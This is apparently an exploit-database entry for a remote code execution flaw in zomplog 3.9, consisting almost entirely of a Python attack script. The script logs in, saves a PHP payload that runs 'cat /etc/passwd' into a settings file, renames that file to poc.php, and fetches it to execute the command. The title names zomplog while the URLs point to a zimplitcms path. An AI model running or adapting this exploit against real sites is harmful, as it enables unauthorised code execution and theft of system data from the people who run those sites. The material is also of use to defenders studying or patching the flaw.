Share
## https://sploitus.com/exploit?id=PACKETSTORM:173806
#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)  
#Application: zomplog   
#Version: v3.9  
#Bugs: RCE  
#Technology: PHP  
#Vendor URL: http://zomp.nl/zomplog/  
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip  
#Date of found: 22.07.2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux   
  
  
import requests  
  
#inputs  
username=input('username: ')  
password=input('password: ')  
  
#urls  
login_url="http://localhost/zimplitcms/zimplit.php?action=login"  
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"  
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"  
poc_url="http://localhost/zimplitcms/poc.php"  
  
  
#login   
session = requests.Session()  
login_data=f"lang=en&username={username}&password={password}&submit=Start!"  
headers={  
'Cookie' : 'ZsessionLang=en',  
'Content-Type' : 'application/x-www-form-urlencoded',  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'  
}  
login_req=session.post(login_url,headers=headers,data=login_data)  
  
if login_req.status_code == 200:  
print('Login OK')  
else:  
print('Login promlem.')  
exit()  
#payload  
payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"  
pheaders={  
'Content-Type' : 'application/x-www-form-urlencoded',  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'  
}  
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)  
  
#rename  
  
rename_req=session.get(rename_url)  
  
#poc  
poc_req=session.get(poc_url)  
print(poc_req.text)  
  
  
#youtube poc video - https://youtu.be/nn7hieGyCFs